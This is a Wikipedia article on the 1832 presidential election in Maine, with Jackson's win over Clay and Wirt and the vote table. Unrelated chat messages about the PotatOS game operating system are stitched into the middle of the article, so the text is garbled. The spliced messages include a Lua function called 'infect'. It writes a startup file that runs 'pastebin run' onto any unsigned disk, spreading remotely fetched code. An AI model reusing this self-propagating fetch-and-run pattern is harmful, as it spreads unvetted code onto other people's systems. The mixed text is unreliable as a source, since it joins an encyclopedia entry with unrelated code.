1832 United States presidential election in Maine

The 1832 United States presidential election in Maine took place between November 2 and December 5, 1832, as part of the 1832 United States presidential election. Voters chose 10 representatives, or electors to the Electoral College, who voted for President and Vice President.

1832 United States presidential election in Maine

November 2 – December 5, 1832
 
Nominee Andrew Jackson Henry Clay
Party Democratic National Republican
Home state Tennessee Kentucky
Running mate Martin Van Buren John Sergeant
Electoral vote 10 0
Popular vote 33,978 27,331
Percentage 54.67% 43.97%

President before election

Andrew Jackson
Democratic

Elected President

Andrew Jackson
Democratic

Maine voted for the Democratic Party candidate, Andrew Jackson, over the National Republican candidate, Henry Clay, and the Anti-Masonic Party candidate, William Wirt. Jackson won the state by a margin of 10.70%.

Results

1832 United States presidential election in Maine[1]
Party Candidate Votes Percentage Electoral votes
Democratic Andrew Jackson 33,978 54.67% 10
National Republican Henry Clay 27,331 43.97% 0
Anti-Masonic William Wirt 844 1.36% 0
Totals 62,153 100.0% 10
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
gollark: Basically, any disk you make *will not be run unsandboxed* on a regular potatOS install.

See also

References

  1. "1832 Presidential General Election Results - Maine". U.S. Election Atlas. Retrieved 12 April 2013.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.